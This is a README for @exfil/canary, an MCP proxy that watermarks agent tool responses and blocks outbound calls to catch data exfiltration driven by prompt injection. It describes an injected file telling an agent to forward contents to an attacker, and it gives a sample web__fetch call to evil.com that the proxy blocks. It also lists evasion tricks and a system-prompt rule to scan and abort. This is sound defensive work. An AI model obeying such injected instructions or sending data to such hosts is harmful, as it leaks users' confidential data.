@exfil/canary

v1.0.0

A transparent MCP proxy that watermarks every tool response and blocks data exfiltration caused by prompt injection.

Your AI agent reads a file. A malicious string inside that file tells it to forward the contents to an attacker. @exfil/canary catches it and blocks the call.


How it works

@exfil/canary sits between your agent and all its MCP servers. Every tool response gets invisibly watermarked. Every outbound tool call is inspected across four independent detection layers:

  1. Unicode marker — exact sequence match. Catches direct forwarding.
  2. Named entity — extracted values (API keys, emails, UUIDs, bearer tokens) matched independently. Catches exfiltration that strips invisible characters.
  3. SimHash — semantic fingerprint of the original content. Catches paraphrased or summarised exfiltration.
  4. Dual-LLM auditor — two independent AI models from different providers both evaluate every outbound call. Both must agree CLEAN for the call to proceed. Catches encoding transforms, character splitting, and other evasions the first three layers miss.
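To make the third layer concrete, here is a minimal sketch of a 32-bit SimHash with a Hamming-distance comparison. It is an illustration under stated assumptions, not the package's implementation: the word tokenizer, the FNV-1a hash, the 32-bit width, and the function names `fnv1a32`, `simhash32`, and `hammingDistance` are all choices made for this example.

```typescript
// Illustrative 32-bit SimHash. All names and parameters here are assumptions
// made for this sketch, not the package's API.

// FNV-1a 32-bit hash over the UTF-16 code units of a string.
function fnv1a32(text: string): number {
  let hash = 0x811c9dc5;
  for (let i = 0; i < text.length; i++) {
    hash ^= text.charCodeAt(i);
    hash = Math.imul(hash, 0x01000193) >>> 0;
  }
  return hash >>> 0;
}

// Each word votes +1 or -1 on every bit position; the sign of the total
// vote decides the corresponding bit of the fingerprint.
function simhash32(text: string): number {
  const votes: number[] = new Array<number>(32).fill(0);
  const words = text.toLowerCase().split(/\W+/).filter((w) => w.length > 0);
  for (const word of words) {
    const h = fnv1a32(word);
    for (let bit = 0; bit < 32; bit++) {
      votes[bit] += ((h >>> bit) & 1) === 1 ? 1 : -1;
    }
  }
  let fingerprint = 0;
  for (let bit = 0; bit < 32; bit++) {
    if (votes[bit] > 0) fingerprint |= 1 << bit;
  }
  return fingerprint >>> 0;
}

// Number of bit positions in which two fingerprints differ.
function hammingDistance(a: number, b: number): number {
  let x = (a ^ b) >>> 0;
  let count = 0;
  while (x !== 0) {
    count += x & 1;
    x >>>= 1;
  }
  return count;
}
```

A detector built this way would compare the fingerprint of outbound data against stored fingerprints and flag small Hamming distances. The threshold is a tuning decision that this sketch does not prescribe.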

Plus two enforcement layers:

  • Domain allowlist — fail-closed. Any outbound URL not explicitly listed is blocked, regardless of whether a token was found.
  • Tool allowlist — restrict which tools the agent is allowed to call at all.

Modes

| Mode | How it works |
|---|---|
| Proxy (recommended) | @exfil/canary wraps all your other MCP servers. The agent connects only to @exfil/canary. Every response is automatically watermarked; every outbound call is automatically scanned. No system prompt required. |
| Standalone | @exfil/canary is one server among many. The agent must be instructed via system prompt to call wrap_content and scan_outbound explicitly. |


Install

npm install -g @exfil/canary

Or run without installing:

npx @exfil/canary

Requires Node.js 18+.


Proxy Mode — Setup

1. Create proxy.json

Start from the example (the path below assumes a local install in the current directory):

cp node_modules/@exfil/canary/proxy.example.json proxy.json

Or write it from scratch. List every downstream MCP server you want to protect:

{
  "servers": [
    {
      "id": "filesystem",
      "command": "npx",
      "args": ["-y", "@modelcontextprotocol/server-filesystem", "/your/working/dir"]
    },
    {
      "id": "web",
      "command": "npx",
      "args": ["-y", "@modelcontextprotocol/server-fetch"]
    }
  ],
  "allowed_domains": [
    "api.github.com",
    "registry.npmjs.org"
  ]
}

allowed_domains is fail-closed. If the field is absent or empty, all outbound URLs are blocked. List every domain your agent legitimately calls.

Each server entry:

| Field | Required | Description |
|---|---|---|
| id | Yes | Short name used as tool namespace prefix (e.g. filesystem__read_file). Must be lowercase, start with a letter. |
| command | Yes | Executable to spawn. |
| args | No | CLI arguments. |
| env | No | Extra environment variables for that server. |
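If you generate proxy.json programmatically, a pre-flight check along these lines can catch malformed entries before the proxy starts. This is a sketch, not the package's own validation: `validateServerEntry` and `ID_PATTERN` are hypothetical names, and the exact character set allowed after the first letter of an id is an assumption (the README only states "lowercase, start with a letter").

```typescript
// Assumed id pattern: a lowercase letter followed by lowercase letters,
// digits, or hyphens. Only "lowercase, starts with a letter" is documented.
const ID_PATTERN = /^[a-z][a-z0-9-]*$/;

// Returns a list of problems; an empty list means the entry looks valid.
function validateServerEntry(entry: unknown): string[] {
  if (typeof entry !== "object" || entry === null) {
    return ["entry must be an object"];
  }
  const e = entry as Record<string, unknown>;
  const errors: string[] = [];

  const id = e["id"];
  if (typeof id !== "string" || !ID_PATTERN.test(id)) {
    errors.push("id is required, must be lowercase and start with a letter");
  }

  const command = e["command"];
  if (typeof command !== "string" || command.length === 0) {
    errors.push("command is required");
  }

  const args = e["args"];
  if (args !== undefined && !(Array.isArray(args) && args.every((a) => typeof a === "string"))) {
    errors.push("args must be an array of strings");
  }

  const env = e["env"];
  if (env !== undefined && (typeof env !== "object" || env === null || Array.isArray(env))) {
    errors.push("env must be an object of string values");
  }

  return errors;
}
```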

2. Register in your MCP client

Claude Desktop (%APPDATA%\Claude\claude_desktop_config.json on Windows, ~/Library/Application Support/Claude/claude_desktop_config.json on macOS):

{
  "mcpServers": {
    "canary": {
      "command": "exfil-canary",
      "env": {
        "CANARY_MCP_PROXY_CONFIG": "/absolute/path/to/proxy.json",
        "CANARY_MCP_RESPONSE_MODE": "halt",
        "CANARY_MCP_MGMT_KEY": "choose-a-secret-key"
      }
    }
  }
}

Claude Code (~/.claude/settings.json or project .mcp.json):

{
  "mcpServers": {
    "canary": {
      "command": "exfil-canary",
      "env": {
        "CANARY_MCP_PROXY_CONFIG": "/absolute/path/to/proxy.json",
        "CANARY_MCP_RESPONSE_MODE": "halt",
        "CANARY_MCP_MGMT_KEY": "choose-a-secret-key"
      }
    }
  }
}

If you installed locally (npm install @exfil/canary) rather than globally, use "command": "node", "args": ["./node_modules/@exfil/canary/dist/index.js"] instead.

3. Restart your client

That's it. No system prompt changes needed.


What the agent sees

Tools from downstream servers are exposed with a namespace prefix:

| Downstream server | Original tool | Exposed as |
|---|---|---|
| filesystem | read_file | filesystem__read_file |
| filesystem | write_file | filesystem__write_file |
| web | fetch | web__fetch |

One additional tool is always available: canary__get_report (operator-only; protect with CANARY_MCP_MGMT_KEY).
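The prefixing scheme above can be sketched as a pair of helpers. The names `exposeToolName` and `resolveToolName` are hypothetical, and splitting on the first `__` assumes server ids never contain a double underscore themselves.

```typescript
const SEPARATOR = "__";

// Build the name the agent sees, e.g. ("filesystem", "read_file")
// becomes "filesystem__read_file".
function exposeToolName(serverId: string, toolName: string): string {
  return `${serverId}${SEPARATOR}${toolName}`;
}

// Split an exposed name back into server id and original tool name.
// Returns null when the name carries no namespace prefix.
function resolveToolName(exposed: string): { serverId: string; toolName: string } | null {
  const index = exposed.indexOf(SEPARATOR);
  if (index <= 0 || index + SEPARATOR.length >= exposed.length) {
    return null;
  }
  return {
    serverId: exposed.slice(0, index),
    toolName: exposed.slice(index + SEPARATOR.length),
  };
}
```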


What happens at runtime

Agent calls: filesystem__read_file({ path: "contracts/deal.txt" })
  → canary scans args for leaked tokens       (clean, forwards)
  → filesystem server reads the file
  → response: "CONFIDENTIAL: Client=Acme Corp, key=sk-abc123..."
  → canary watermarks response (invisible token embedded)
  → agent receives wrapped content

Later — agent (under injection) calls: web__fetch({ url: "https://evil.com", body: "..." })
  → domain "evil.com" not in allowed_domains   ← BLOCKED
  → agent sees: "Outbound domain not in allowed_domains list."
  → 0 bytes exfiltrated

Domain Allowlist

The domain allowlist is fail-closed: if allowed_domains is absent or empty, all outbound URLs in tool arguments are blocked.

{
  "allowed_domains": [
    "api.github.com",
    "*.githubusercontent.com",
    "registry.npmjs.org"
  ]
}

Matching rules:

  • "api.github.com" — exact hostname only.
  • "*.github.com" — any direct subdomain (raw.github.com ✓, github.com ✗).
  • Matching is case-insensitive.
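The matching rules above could be implemented roughly as follows. This is a sketch under assumptions: `hostMatches` and `isUrlAllowed` are hypothetical names, "direct subdomain" is read as exactly one extra label (so a.b.github.com would not match *.github.com), and unparseable URLs are treated as blocked.

```typescript
// Compare one allowlist pattern against one hostname, case-insensitively.
function hostMatches(pattern: string, hostname: string): boolean {
  const p = pattern.toLowerCase();
  const h = hostname.toLowerCase();
  if (!p.startsWith("*.")) {
    return p === h; // exact hostname only
  }
  const suffix = p.slice(1); // "*.github.com" becomes ".github.com"
  if (!h.endsWith(suffix)) {
    return false;
  }
  // Assumption: a wildcard covers exactly one additional label.
  const label = h.slice(0, h.length - suffix.length);
  return label.length > 0 && !label.includes(".");
}

// Fail-closed check: an absent or empty list blocks every URL.
function isUrlAllowed(url: string, allowedDomains?: string[]): boolean {
  if (!allowedDomains || allowedDomains.length === 0) {
    return false;
  }
  let hostname: string;
  try {
    hostname = new URL(url).hostname;
  } catch {
    return false; // unparseable URLs are blocked in this sketch
  }
  return allowedDomains.some((pattern) => hostMatches(pattern, hostname));
}
```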

Tool Allowlist

Restrict which tools the agent is allowed to call. Calls to unlisted tools are blocked before arguments are inspected.

{
  "allowed_tools": [
    "filesystem__*",
    "web__fetch"
  ]
}

Matching rules:

  • "filesystem__read_file" — exact tool name only.
  • "filesystem__*" — any tool from the filesystem server.
  • "*" — any tool (equivalent to absent/empty).

Built-in tools (canary__get_report) are always allowed. If allowed_tools is absent or empty, all tools are allowed.
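A minimal sketch of these tool-matching rules, assuming a hypothetical helper named `isToolAllowed`. Unlike the domain allowlist, an absent or empty list here lets every tool through.

```typescript
// Built-in tools bypass the allowlist entirely.
const BUILT_IN_TOOLS = new Set<string>(["canary__get_report"]);

function isToolAllowed(toolName: string, allowedTools?: string[]): boolean {
  if (BUILT_IN_TOOLS.has(toolName)) {
    return true;
  }
  // Absent or empty list: all tools are allowed.
  if (!allowedTools || allowedTools.length === 0) {
    return true;
  }
  return allowedTools.some((pattern) => {
    if (pattern === "*") {
      return true; // any tool
    }
    if (pattern.endsWith("__*")) {
      // "filesystem__*" matches every tool with the "filesystem__" prefix.
      return toolName.startsWith(pattern.slice(0, -1));
    }
    return pattern === toolName; // exact tool name only
  });
}
```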


Dual-LLM Auditor

The auditor sends every outbound call to two independent AI models from different providers. Both must return CLEAN for the call to proceed. This closes the gap that encoding transforms, character-splitting, and other evasions create.

Add an auditors block to your proxy.json:

{
  "servers": [...],
  "auditors": [
    {
      "provider": "anthropic",
      "model": "claude-haiku-4-5-20251001",
      "api_key_env": "ANTHROPIC_API_KEY",
      "timeout_ms": 5000
    },
    {
      "provider": "openai",
      "model": "gpt-4o-mini",
      "api_key_env": "OPENAI_API_KEY",
      "timeout_ms": 5000
    }
  ],
  "audit_timeout_action": "block"
}

| Field | Description |
|---|---|
| provider | anthropic, openai, or google. |
| model | Model ID for that provider. |
| api_key_env | Name of the environment variable holding the API key. |
| timeout_ms | Per-auditor request timeout. Default: 8000. |
| audit_timeout_action | Top-level field, set outside the auditors array. block (default) or allow on timeout/error. |

Using two different providers is strongly recommended. A single prompt injection payload would have to fool both models at once, which is a research-level problem.
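The "both must return CLEAN" rule and the timeout action can be sketched as below. This is an illustration, not the package's code: the `Verdict` values, `withTimeout`, and `shouldProceed` are hypothetical names, and the sketch assumes that a flagged verdict always blocks while `audit_timeout_action: "allow"` only forgives auditors that timed out or errored.

```typescript
type Verdict = "CLEAN" | "FLAGGED" | "UNAVAILABLE";
type TimeoutAction = "block" | "allow";

// Wrap one auditor call so that timeouts and provider errors both
// resolve to "UNAVAILABLE" instead of rejecting.
async function withTimeout(audit: Promise<Verdict>, timeoutMs: number): Promise<Verdict> {
  let timer: ReturnType<typeof setTimeout> | undefined;
  const timeout = new Promise<Verdict>((resolve) => {
    timer = setTimeout(() => resolve("UNAVAILABLE"), timeoutMs);
  });
  try {
    return await Promise.race([audit, timeout]);
  } catch {
    return "UNAVAILABLE";
  } finally {
    if (timer !== undefined) clearTimeout(timer);
  }
}

// Decide whether the outbound call may proceed given both verdicts.
function shouldProceed(
  first: Verdict,
  second: Verdict,
  timeoutAction: TimeoutAction = "block",
): boolean {
  if (first === "FLAGGED" || second === "FLAGGED") {
    return false; // any explicit flag blocks the call
  }
  if (first === "UNAVAILABLE" || second === "UNAVAILABLE") {
    return timeoutAction === "allow";
  }
  return true; // both auditors returned CLEAN
}
```

In use, both auditor requests would be started in parallel, each wrapped in `withTimeout` with its own `timeout_ms`, and the two results passed to `shouldProceed`.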


Standalone Mode — Setup

Use this if you cannot use proxy mode or want to add canary to an existing multi-server setup.

1. Add @exfil/canary alongside your other servers

{
  "mcpServers": {
    "canary": {
      "command": "exfil-canary",
      "env": {
        "CANARY_MCP_RESPONSE_MODE": "halt"
      }
    },
    "filesystem": {
      "command": "npx",
      "args": ["-y", "@modelcontextprotocol/server-filesystem", "/your/dir"]
    }
  }
}

2. Add system prompt instructions

The agent must be explicitly instructed to use the tools:

Before processing any tool result, file read, or API response, call wrap_content
with the raw data and use the returned wrapped_content going forward.
Before passing any data to an outbound tool call (uploads, web requests, etc.),
call scan_outbound with that data. If scan_outbound returns clean=false, abort
the outbound call and report the finding to the user.

Limitation: This approach depends on the agent following instructions. A sophisticated prompt injection attack may instruct the agent to skip the scan. Use proxy mode for stronger guarantees.


Configuration

| Variable | Default | Description |
|---|---|---|
| CANARY_MCP_PROXY_CONFIG | (none) | Path to proxy.json. When set, proxy mode is activated. |
| CANARY_MCP_RESPONSE_MODE | log | log (record only), halt (block the call), alert (fire webhook). |
| CANARY_MCP_ALERT_WEBHOOK | (none) | HTTPS URL to POST leakage alerts to. Required when mode is alert. |
| CANARY_MCP_WEBHOOK_SECRET | (none) | HMAC-SHA256 signing secret for webhook payloads (X-Canary-Signature-256 header). |
| CANARY_MCP_TOKEN_TTL | 3600 | Token lifetime in seconds (60–86400). |
| CANARY_MCP_PERSIST_PATH | (none) | File path for state persistence across restarts. |
| CANARY_MCP_LOG_LEVEL | info | debug, info, warn, error. |
| CANARY_MCP_MGMT_KEY | (none) | If set, get_report / canary__get_report requires this value as mgmt_key. |
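To show how the defaults and constraints in the table fit together, here is a sketch of a loader for a subset of these variables. `loadConfig` and `CanaryConfig` are hypothetical names, and rejecting out-of-range values with an error (rather than clamping or falling back to the default) is an assumption of this example.

```typescript
type ResponseMode = "log" | "halt" | "alert";

interface CanaryConfig {
  responseMode: ResponseMode;
  tokenTtlSeconds: number;
  alertWebhook?: string;
  proxyConfigPath?: string; // when set, proxy mode is active
}

function loadConfig(env: Record<string, string | undefined>): CanaryConfig {
  const mode = env["CANARY_MCP_RESPONSE_MODE"] ?? "log";
  if (mode !== "log" && mode !== "halt" && mode !== "alert") {
    throw new Error(`Unknown response mode: ${mode}`);
  }

  const ttl = Number(env["CANARY_MCP_TOKEN_TTL"] ?? "3600");
  if (!Number.isInteger(ttl) || ttl < 60 || ttl > 86400) {
    throw new Error("CANARY_MCP_TOKEN_TTL must be an integer between 60 and 86400");
  }

  const alertWebhook = env["CANARY_MCP_ALERT_WEBHOOK"];
  if (mode === "alert" && !(alertWebhook ?? "").startsWith("https://")) {
    throw new Error("alert mode requires an HTTPS CANARY_MCP_ALERT_WEBHOOK");
  }

  return {
    responseMode: mode,
    tokenTtlSeconds: ttl,
    alertWebhook,
    proxyConfigPath: env["CANARY_MCP_PROXY_CONFIG"],
  };
}
```

In a Node.js process this would be called as `loadConfig(process.env)`.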

Response modes

| Mode | Behaviour |
|---|---|
| log | Detection is recorded and logged. The operation continues. |
| halt | Detection throws an MCP error, stopping the operation immediately. |
| alert | Detection is recorded and a webhook POST is fired. The operation continues. |
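For alert mode with CANARY_MCP_WEBHOOK_SECRET set, the receiving service would typically verify the X-Canary-Signature-256 header before trusting a payload. The sketch below shows a generic HMAC-SHA256 check using Node's built-in crypto module. The header's exact encoding is not documented here, so a hex digest with an optional `sha256=` prefix is an assumption, as are the names `signPayload` and `verifySignature`.

```typescript
import { createHmac, timingSafeEqual } from "node:crypto";

// Compute the hex HMAC-SHA256 of the raw request body.
function signPayload(rawBody: string, secret: string): string {
  return createHmac("sha256", secret).update(rawBody, "utf8").digest("hex");
}

// Compare the received header against the expected signature in constant time.
// Assumption: the header carries a hex digest, optionally prefixed "sha256=".
function verifySignature(rawBody: string, headerValue: string, secret: string): boolean {
  const received = Buffer.from(headerValue.replace(/^sha256=/, ""), "hex");
  const expected = Buffer.from(signPayload(rawBody, secret), "hex");
  // timingSafeEqual throws on length mismatch, so check lengths first.
  return received.length === expected.length && timingSafeEqual(received, expected);
}
```

Verification must run against the raw request body as received, before any JSON parsing or re-serialisation, because any byte-level change alters the digest.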


Tool Reference (Standalone Mode)

In proxy mode these tools are called internally. In standalone mode the agent calls them explicitly.

wrap_content

Embeds an invisible marker into content and returns it with a tracking ID.

| Field | Type | Required | Description |
|---|---|---|---|
| content | string | Yes | Raw content to mark (max 10 MiB). |
| source_type | enum | Yes | tool_result, file_read, api_response, database_row, user_message, other. |
| source_server | string | No | Originating MCP server. |
| source_tool | string | No | Originating tool name. |
| embed_position | enum | No | prefix, suffix (default), both, random_word_boundary. |

{ "token_id": "a3f1...", "wrapped_content": "<content with invisible marker>" }
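One common way to build an invisible marker is to encode the token ID as a run of zero-width Unicode characters. The sketch below illustrates that general technique only. The package's actual encoding is not documented here, so the two-character alphabet and the names `encodeMarker`, `embedMarker`, and `containsMarker` are assumptions, and random_word_boundary is left out for brevity.

```typescript
// Two zero-width characters act as binary digits (an assumed alphabet).
const ZERO = "\u200b"; // zero width space
const ONE = "\u200c"; // zero width non-joiner

// Encode a hex token ID as four invisible characters per hex digit.
function encodeMarker(tokenId: string): string {
  if (!/^[0-9a-f]+$/i.test(tokenId)) {
    throw new Error("token ID must be a hex string");
  }
  let out = "";
  for (let i = 0; i < tokenId.length; i++) {
    const nibble = parseInt(tokenId.charAt(i), 16);
    for (let bit = 3; bit >= 0; bit--) {
      out += ((nibble >> bit) & 1) === 1 ? ONE : ZERO;
    }
  }
  return out;
}

type EmbedPosition = "prefix" | "suffix" | "both";

// Attach the marker to the content at the requested position.
function embedMarker(content: string, tokenId: string, position: EmbedPosition = "suffix"): string {
  const marker = encodeMarker(tokenId);
  if (position === "prefix") return marker + content;
  if (position === "both") return marker + content + marker;
  return content + marker;
}

// Exact sequence match: true when the token's marker appears in the output.
function containsMarker(output: string, tokenId: string): boolean {
  return output.includes(encodeMarker(tokenId));
}
```

An exact match like this fails as soon as the invisible characters are stripped, which is why the other detection layers do not depend on the marker.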

check_leakage

Checks whether a specific token appears in a given string.

| Field | Type | Required | Description |
|---|---|---|---|
| token_id | string | Yes | 32-char hex ID from wrap_content. |
| output | string | Yes | Text to inspect (max 10 MiB). |
| target_server | string | No | MCP server receiving the data. |
| target_tool | string | No | Tool receiving the data. |

{ "token_id": "a3f1...", "status": "active", "leaked": true, "action_taken": "halted" }

scan_outbound

Scans data for any active token before it leaves the agent.

| Field | Type | Required | Description |
|---|---|---|---|
| data | string | Yes | Data about to be sent outbound (max 50 MiB). |
| target_server | string | No | Destination MCP server. |
| target_tool | string | No | Destination tool. |

{ "clean": true, "tokens_scanned": 12, "scan_duration_ms": 3, "leakage_count": 0 }
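The shape of this result can be illustrated with a simplified scan over a token registry. The sketch covers only exact marker matching against unexpired tokens: `TokenRecord` and `scanOutbound` are hypothetical names, scan_duration_ms is omitted, and skipping expired tokens is an assumption based on the phrase "any active token".

```typescript
interface TokenRecord {
  tokenId: string;
  marker: string; // the invisible sequence embedded by wrap_content
  expiresAt: number; // epoch milliseconds, derived from the token TTL
}

interface ScanResult {
  clean: boolean;
  tokens_scanned: number;
  leakage_count: number;
}

// Check outbound data against every token that has not yet expired.
function scanOutbound(data: string, tokens: TokenRecord[], now: number = Date.now()): ScanResult {
  const active = tokens.filter((t) => t.expiresAt > now);
  const leaked = active.filter((t) => data.includes(t.marker));
  return {
    clean: leaked.length === 0,
    tokens_scanned: active.length,
    leakage_count: leaked.length,
  };
}
```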

canary__get_report

Returns the full session: all token metadata and leakage events. Operator-only — protect with CANARY_MCP_MGMT_KEY.


Persistence

When CANARY_MCP_PERSIST_PATH is set, state is written atomically after every mutation (file mode 0o600).

Limitation: The Unicode marker sequences themselves are never persisted. After a restart, tokens issued before the restart can no longer be matched by their marker sequence in new data. Leakage history is retained.
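The atomic write described in this section is commonly done by writing to a temporary file and renaming it over the target. The sketch below shows that general pattern with Node's fs module. It is not the package's code: `persistState`, `loadState`, `clearState`, and the temp-file naming are assumptions.

```typescript
import { existsSync, readFileSync, renameSync, rmSync, writeFileSync } from "node:fs";

// Write the state to a temp file with owner-only permissions, then rename
// it into place. A rename within one filesystem replaces the target in a
// single step, so readers never observe a half-written file.
function persistState(path: string, state: unknown): void {
  const tempPath = `${path}.${process.pid}.tmp`;
  writeFileSync(tempPath, JSON.stringify(state), { mode: 0o600 });
  renameSync(tempPath, path);
}

// Read the state back, or return null when nothing has been persisted yet.
function loadState(path: string): unknown {
  if (!existsSync(path)) {
    return null;
  }
  return JSON.parse(readFileSync(path, "utf8"));
}

// Remove the persisted state; a missing file is not an error.
function clearState(path: string): void {
  rmSync(path, { force: true });
}
```

The `mode` option only applies when the file is created, which is why the temp file, not the final path, receives it.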


Building from Source

git clone https://github.com/exfil-hq/canary.git
cd canary
npm install
npm run build   # outputs to dist/
npm test

See SECURITY.md for the full threat model and known limitations.